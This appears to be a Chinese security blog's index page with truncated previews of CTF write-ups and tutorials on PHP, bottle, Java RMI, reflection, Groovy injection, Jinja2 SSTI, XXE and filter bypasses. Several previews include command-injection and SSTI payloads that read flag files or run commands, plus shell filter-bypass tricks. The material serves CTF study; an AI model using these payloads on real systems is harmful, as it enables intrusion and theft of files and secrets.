题目源码: index.php <?php# index.phpsession_start();error_reporting(0);if (!isset($_SESSION['dir'])) { $_SESSION['dir'] = random_bytes(4);}if (!isset($_GET['url'])) { die("Nope :<");…
ez_bottle 源码 from bottle import route, run, template, post, request, static_file, errorimport osimport zipfileimport hashlibimport time# hint: flag in /flag , have a tryUPLOAD_DIR = os.path.join(os.…
RMI全称是Remote Method Invocation,远程⽅方法调⽤ 是让某个Java虚拟机上的对象调⽤另一个Java虚拟机中对象上的⽅方法,只不不过RMI是Java独 有的⼀一种机制 本质是跨越调用JVM对象方法,跨网络的对象方法调用 RMI 的核心概念 远程对象(Remote Object) 运行在远程 JVM 上的对象,必须继承 UnicastRemoteObject 并实现 Rem…
说在前面 其实是老文章了,但是想到小登都来了,我再好好整整,同时也发现有一些新的姿势,一块整理了不,持续更新 绕过! 类似于str_replace()('flag','')的过滤我们可以使用双写绕过。flflagag把中间的flag替换为空之后还是flag 过滤空格 < 、<>、%09(tab)、%20、$IFS$9、$IFS$1、${IFS}、$IFS等,还可以用{} 比如 {…
Web 396-401 url=http://1/1;echo `ls`>a.txturl=http://1/1;echo `cat fl0g.php`>a.txt 具体函数研究可以看过去文章 Web 402 url=file://1/1;echo `cat fl0g.php`>a.txt 简单一看 <?php$url = 'file://1/1;echo `cat fl0…
赛后拿wp来学习分析 主要是一个请求处理的差异 const { FLAG, SECRET } = process.env;const PORT = 3000;const app = express();app.use(express.urlencoded({ extended: true }));const sleep = d => new Promise(r => setTime…
web easyGooGooVVVY 描述 高松灯是一名java安全初学者,最近她在看groovy表达式注入。。。 搜文章去看了groovy表达式注入,没利用成功 可以打反射或者命令注入 def pb = new ProcessBuilder('printenv')def proc = pb.start()proc.waitFor()def stream = proc.getInputStream…
Java反射是一个强大的特性,允许程序在运行时查询,访问和修改类,接口,字段和方法的信息 反射提供了一种动态操作类的能力,通过这种机制能够在运行时获得类的信息,并且运行时修改类的结构,调用类的方法,实例化对象等 先来个例子 import java.util.*;import java.lang.reflect.*;class Dog { public void cry() { &n…
web361 简单测试一遍 ?name={{7*7}} 回显49证明存在SSTI,是jiaji 无过滤直接上payload吧 ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__["popen"]("cat /flag").read()}} 多写几个payload ?name={{lipsum.__glob…
XXE漏洞概述 XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入 XXE漏洞原理 漏洞成因:解析时未对XML外部实体加以限制,导致攻击者将恶意代码注入到XML中,导致服务器加载恶意的外部实体引发文件读取,SSRF,命令执行等危害操作 特征:在HTTP的Request报文出现一下请求报文,即表明此时是采用XML进行数据传输,就可以测试是否存在XM…